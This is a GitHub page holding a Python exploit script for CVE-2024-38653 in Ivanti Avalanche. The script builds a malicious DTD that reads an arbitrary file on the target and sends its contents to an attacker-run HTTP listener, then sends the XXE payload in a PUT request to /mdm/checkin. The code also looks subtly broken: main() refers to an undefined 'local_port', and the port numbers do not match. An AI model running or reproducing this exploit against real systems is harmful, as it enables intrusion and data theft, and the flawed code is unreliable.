-
Notifications
You must be signed in to change notification settings - Fork 2
/
ivanti-avalanche-cve-2024-38653.py
75 lines (65 loc) · 2.74 KB
/
ivanti-avalanche-cve-2024-38653.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/python3
import threading
import http.server
import socketserver
import requests
import urllib3
import argparse
from http.server import SimpleHTTPRequestHandler
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Function to create a malicious DTD file
def create_malicious_dtd(filename, local_ip, local_port):
print(f"[*] Creating malicious DTD... {local_port}")
raw_dtd = f"<!ENTITY % file SYSTEM \"file:///{filename}\">" + "\n"
raw_dtd += f"<!ENTITY % eval \"<!ENTITY % exfiltrate SYSTEM 'http://{local_ip}:{local_port}/?content=%file;'>\">" + "\n"
raw_dtd += "%eval;" + "\n"
raw_dtd += "%exfiltrate;" + "\n"
with open("malicious.dtd", "w") as f:
f.write(raw_dtd)
f.close()
print(f"[*] Malicious DTD created to read {filename}")
# Function to start a Python server
def start_python_server(local_ip, local_port):
try:
with socketserver.TCPServer((local_ip, local_port), SimpleHTTPRequestHandler) as httpd:
print(f"Serving HTTP on {local_ip} port {local_port}...")
httpd.serve_forever()
except Exception as e:
print(f"Error: {e}")
exit(1)
# Function to perform the HTTP PUT request
def perform_put(HOST, local_ip, local_port):
print("[*] Sending payload to the target...")
try:
xml = "<?xml version=\"1.0\" ?>\n" \
"<!DOCTYPE a [\n" \
f"<!ENTITY % asd SYSTEM \"http://{local_ip}:{local_port}/malicious.dtd\">\n" \
"%asd;\n" \
"%c;\n" \
"]>\n" \
"<a></a>"
r = requests.put(f"https://{HOST}/mdm/checkin", data=xml, verify=False)
print(f"[*] Response Status: {r.status_code}")
print(f"[*] Response Text: {r.text}")
except KeyboardInterrupt:
pass
exit(1)
def main():
parser = argparse.ArgumentParser(description="A script to start a server and perform a PUT request.")
parser.add_argument('--target', required=True, help='Hostname or IP address to target')
parser.add_argument('--filename', required=True, help='Path to the file to be used')
parser.add_argument('--local-ip', required=True, help='Local IP address to bind the server')
parser.add_argument('--port', required=True, help='Port number for the listener')
args = parser.parse_args()
HOST = args.target
filename = args.filename
local_ip = args.local_ip
port = args.port
local_http_port = 8000
create_malicious_dtd(filename, local_ip, port)
# Execute the perform_put after starting the server
server_thread = threading.Thread(target=start_python_server, args=(local_ip, local_http_port))
server_thread.start()
perform_put(HOST, local_ip, local_port)
if __name__ == '__main__':
main()